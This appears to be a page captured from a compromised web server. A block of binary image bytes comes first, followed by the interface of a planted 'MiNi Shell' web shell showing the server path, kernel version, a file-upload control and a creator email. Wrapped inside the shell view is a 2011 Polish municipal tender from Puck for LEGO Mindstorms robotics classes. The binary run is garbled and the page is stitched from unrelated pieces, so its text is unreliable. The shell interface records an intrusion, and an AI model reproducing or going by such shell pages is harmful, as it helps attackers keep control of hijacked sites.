JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111005/321000-N-2011.html

<p class="kh_header"><b>Puck: Prowadzenie zajęć Młody inżynier programuje - dodatkowe zajęcia wzmacniające kompetencje naukowo techniczne wraz z zapewnieniem sprzętu do prowadzenia zajęć oraz przygotowaniem i drukiem podręczników do prowadzenia zajęć</b><br>
<b>Numer ogłoszenia: 321000 - 2011; data zamieszczenia: 05.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Puck , ul. 1 Maja 13, 84-100 Puck, woj. pomorskie, tel. 58 6730500, 6730534, faks 58 6730533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.puck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć Młody inżynier programuje - dodatkowe zajęcia wzmacniające kompetencje naukowo techniczne wraz z zapewnieniem sprzętu do prowadzenia zajęć oraz przygotowaniem i drukiem podręczników do prowadzenia zajęć.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi zorganizowanie i przeprowadzenie innowacyjnych zajęć wzmacniających kompetencje naukowo- techniczne pn. Młody inżynier programuje - dodatkowe zajęcia wzmacniające kompetencje naukowo techniczne wraz z zapewnieniem sprzętu do prowadzenia zajęć oraz przygotowaniem i drukiem podręczników do prowadzenia zajęć w  szkole podstawowej i publicznym gimnazjum w Pucku (gmina miasto Puck).
Szczegółowo zadanie obejmuje:

1. Przeprowadzenie zajęć dla 192 osób, podczas których uczniowie będą budować, programować oraz testować  roboty zbudowane z zestawów LEGO Mindstorms lub równoważnych. Zajęcia odbywać się będą w dwóch cyklach: I cykl: X.2011-VI.2012; II cykl: X.2012- VI.2013

Zajęcia składać się muszą z trzech etapów: budowanie robota na podstawie specjalnie przygotowanej instrukcji krok po kroku, programowanie graficzne oraz testowanie i zabawa zbudowaną konstrukcją. Na zajęciach uczniowie poznają podstawy konstrukcji maszyn oraz techniki programowania. Wymagane jest wykorzystanie graficznego języka programowania. Wymagane jest, aby uczniowie pracowali zawsze w 2os. zespołach, a na każdy zespół przypadał jeden zestaw konstrukcyjny- model pracy zespołowej ma służyć budowaniu pożądanych relacji rówieśniczych oraz nauce pracy w grupie. Należy uwzględnić, że każda z grup musi być prowadzona przez min. dwóch lektorów. Aby zagwarantować trwałość wartości edukacyjnej prowadzonych zajęć. 

Wykonawca do oferty dołączy autorski program zajęć uwzględniający rozwój kompetencji naukowo- technicznych uczestników zajęć wraz z liczbą odbytych spotkań. Prowadzenie zajęć powinno opierać się na niepowtarzalnym programie nauczania, który ma uwzględniać podział tematyczny spotkań oraz możliwość dostosowania stopnia trudności do wiedzy uczniów. Wymaga się, aby nauka podstaw programowania prowadzona była równolegle z nauką podstaw konstrukcji maszyn po to, aby uczniowie od razu wykorzystywali nowo nabytą wiedzę. 

Zajęcia prowadzone będą w: Szkole Podstawowej im. Mariusza Zaruskiego w Pucku (Puck, ul. Przebendowskiego 27) oraz Publicznym Gimnazjum im. Morskiego Dywizjonu Lotniczego w Pucku (Puck, ul. Nowy Świat 12).
Uczestnicy zajęć:
W  każdym cyklu udział weźmie 96 uczniów, po 48 uczniów z każdej szkoły, którzy utworzą 16 osobowe grupy warsztatowe. Każda grupa odbędzie 20 spotkań z robotyką, każde trwające 3 godziny lekcyjne (łącznie 60 godzin na grupę). Liczba godzin zajęć z robotyki w obu cyklach ogółem wynosi 720 godzin lekcyjnych. 
Wykonawca zobowiązany będzie do prowadzenia dokumentacji związanej z prowadzeniem zajęć w dziennikach zajęć oraz wykonywania zdjęć potrzebnych do dokumentacji. Po zakończeniu zajęć w poszczególnym semestrze w danej szkole wykonawca dostarczy dokumentację do Biura Projektu. 

2. Opracowanie merytoryczne i graficzne Podręcznika.

Do prawidłowej realizacji zajęć oraz zapewnienia trwałości projektu konieczne jest opracowanie merytoryczne, graficzne, skład i wydruk podręcznika, który zostanie przekazany uczniom biorącym udział w robotyce. Podręcznik posłuży uczniom do utrwalenia wiedzy oraz pozwoli wrócić do programowania i konstruowania budowli po projekcie. Zakres merytoryczny Podręcznika powinien bazować na autorskim programie dydaktycznym realizowanym podczas zajęć oraz utrwalać treści przerabiane podczas pracy nad konstrukcjami w tym: strukturę algorytmów, naukę instrukcji warunkowych, opis bloczków programowania, podstawowe funkcje elementów elektronicznych koniecznych do pracy robota. 

Część zamówienia dot. przygotowania podręcznika obejmuje realizację następujących elementów:
a) wykonanie projektu graficznego okładek (przedniej i tylnej wew. i zew.)
b) wykonanie projektu graficznego stron
c) dobór czcionki, skład, łamanie i korekta
d) opracowanie rozdziałów merytorycznych nawiązujących do programu zajęć
e) przekazanie Zamawiającemu podręcznika do zaopiniowania przed wydrukiem
f) wydruk 192 egzemplarzy Podręcznika
Opracowanie graficzne musi uwzględniać system identyfikacji wizualnej dla Programu operacyjnego Kapitał Ludzki, zgodnie z Zasadami promocji projektów dla beneficjentów PO KL na okładce Podręcznika.

Specyfikacja techniczna podręcznika:
Format: B4
Planowany nakład: 192 
Okładka, środek: Okładka- 4 strony, oprawa twarda, kolor 4+4, papier kreda 200 gr
Środek: min. 10 kart (20 stron),kolor 4+4,  papier kreda 135 gr

3. Zakup zestawów edukacyjnych LEGO Mindstorms NXT 2.0 lub równoważnych:
Specyfikacja techniczna sprzętu:
- Zestaw Lego Mindstorms NXT 2.0 lub równowazny, każdy składający się z : 
Kostka NXT z 32-bitowym procesorem lub równoważnym, 
Oprogramowanie NXT-G lub równoważne,
Min. 3 serwomotory z wbudowanymi czujnikami obrotu, 
Min. 1 czujnik koloru, 
Min. 1 dalmierz ultradźwiękowy, 
Min. 2 czujniki dotyku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 73.12.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga szczegółowego warunku w tym zakresie.
Ocena na podstawie oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony jeżeli Wykonawca wykaże, że wykonywał usługę o wartości nie mniejszej niż 250 tysięcy złotych brutto, polegającą na prowadzeniu zajęć z robotyki dla min. 192 uczniów Szkół podstawowych i/lub gimnazjum, która obejmowała: zorganizowanie i prowadzenie zajęć według autorskiego programu dydaktycznego, prowadzenie dokumentacji (dzienniki zajęć, zdjęcia itp.), monitoring i ewaluację postępów w nauce uczestników z wykorzystaniem testów i ankiet. Do wykazu należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga szczegółowego warunku w tym zakresie.
Ocena na podstawie oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykładowcy powinni posiadać wykształcenie wyższe w zakresie robotyki, matematyki lub nauk przyrodniczych.
2. doświadczenie w pracy z uczniami szkół podstawowych i/lub gimnazjum. 
Zamawiający dokona oceny na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga szczegółowego warunku w tym zakresie.
Ocena na podstawie oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.miasto.puck.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Puck, ul. 1 Maja 13, 84-100 Puck.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2011 godzina 10:00, miejsce: Urząd Miasta Puck, ul. 1 Maja 13, 84-100 Puck. Sekretariat - pokój 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Stawiamy na wiedzę!-Dodatkowe zajęcia pozalekcyjne dla dzieci i młodzieży z Pucka współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com